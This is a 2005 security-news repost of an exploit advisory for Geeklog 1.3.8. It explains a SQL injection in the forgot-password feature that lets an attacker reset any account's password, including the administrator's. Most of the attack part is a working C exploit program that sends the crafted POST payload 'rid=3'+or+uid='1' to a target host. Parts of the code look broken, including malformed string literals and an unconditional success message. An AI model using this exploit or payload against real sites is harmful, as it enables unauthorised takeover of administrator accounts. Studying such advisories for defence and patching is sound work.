Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | GeekLog POST Password Validation Exploit |
|---|
Categorie: Vulnerability
Posted: 2005-04-09 by basher13
Views: 1139
| Current Rating: Not rated
|
| | Details |
|---|
Update:
8:45 AM 4/9/2005
Subject:
" GeekLog POST Password Validation Exploit "
Vulnerable version:
Geeklog 1.3.8-1sr1
Description:
Geeklog is a weblog powered by PHP and MySQL. It allows you within minutes to set
up a fully functioning dynamic website, and has many features to get you started.
As of Geeklog 1.3, these features are:
User-system, allowing members of the public to register for your site and submit stories.
Comment system, allowing users to comment on posts made to your site.
Block system, allowing you to put information anywhere on your site.
Plugin system that allows you to extend Geeklog, without having to code any new PHP.
Theme system that allows users to select what layout they want to view.
Excellent security model that allows you to give users control over certain aspects of the
site with no need to worry.
Site Statistics that show you the most popular areas of your site.
Link system that allows users to add links to the site.
Calendar System that lets you and your user add up-and-coming events.
Allow users to email stories to their friends.
Vulnerability:
The below exploit uses the "forgot password" feature introduced in Geeklog 1.3.8.
By constructing a certain kind of HTTP request, an attacker can change any user's
Geeklog password, including the administrator password.
This is because an SQL injection problem. In users.php we have this kind of code
(line about 750):
if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {
$valid = DB_count($_TABLES['users'], arrary('uid', 'pwrequestid'),
array($uid, $reqid));
if ($valid==1) {
// generate an md5 hash for the new password and change it
} else {
// invalid request, display error message
}
}
The database module layer hides the actual SQL queries and this does not look very
clear yet, but if we log all SQL queries executed, we see that the above code produces
this SQL (with e.g. $uid=2 and $reqid=3):
SELECT COUNT(*) FROM gl_users WHERE uid = '2' AND pwrequestid = '3'
The password is changed only if the count returned by this query is exactly one. The
only check done for $reqid is that it is not empty. It can contain anything, so changing
$reqid to e.g. "3' or uid='1" the SQL server will get this query instead:
SELECT COUNT(*) FROM gl_users
WHERE uid = '2' AND pwrequestid = '3' or uid='1'
The pwrequestid = '3' condition is false unless the admin user really forgot the password
and uses this feature at the same time (very unlikely). However, because of the "or uid='1'"
part, the query will still return one, because a user with uid=1 exists (the Anonymous user).
So, the $valid variable in the above code is set to one and the password is changed.
This of course has nothing to do with displaying error messages. The exploit does not produce
any error message because the SQL code above is correct.
Exploit:
/*
GeekLog POST Password Validation Exploit
----------------------------------------
INFGP - Hacking&security Research
[+]Connecting...[OK]
[+]Building string code..[OK]
[+]Send evil request...[DONE]
[*]Set http://infamous-group for adminstration status..[SUCCESS]
Greet: Jouko Pynnonen (has discovered bug),MurDoK
info : 98.to/infamous
*/
#include <netdb.h>
int i=0, x=0, fd;
struct sockaddr_in sock;
struct hostent *he;
char slutcode[1000] =
"POST %s /users.php HTTP/1.1\r\n"
"Connection: Keep-Alive\r\n"
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
"Referer: http://%s/%s \r\n"
"Pragma: no-cache\r\n"
"Cache-control: no-cache\r\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
"Accept-Language: es, en\r\n"
"Host: 192.168.0.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Authorization: Basic\r\n"
"Content-Length: 62\r\n"
"\r\n";
//"mode=setnewpwd&passwd=123win&uid=2&rid=3'+or+uid='1&"",argv[2],argv[1],argv[2];
int main(int argc, char *argv[]) {
// system("clear");
printf("GeekLog POST Password Validation Exploit\n");
printf("-----------------------------\n");
printf("INFGP-Hacking&Security Research\n\n");
if(argc<4) {
printf("Usage: %s [target] [path] [new_pass]\n\n", argv[0]);
exit(1);
}
fd = socket(AF_INET, SOCK_STREAM, 0);
he = gethostbyname(argv[1]);
memset((char *) &sock, 0, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port=htons(80);
sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);
printf("[+]Connecting... ");
if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
printf("[-]Connect to host FAILED\n");
return 0;
}
printf("[OK]\n");
printf("[+]Building string code..");
strcat(slutcode, "mode=setnewpwd&passwd=");
strcat(slutcode, argv[3]);
strcat(slutcode, "&uid=2&rid=3'+or+uid='1&"");
printf("[OK]\n");
printf("[+]Send evil request...");
write(fd, slutcode, strlen(slutcode));
printf("[DONE]\n");
printf("[*]Set http://%s for adminstration status..[SUCCESS]\n", argv[1]);
close(fd);
return 1;
}
Solution:
The author have released a fixed version
Vendor URL:
http://www.geeklog.net
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1462
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
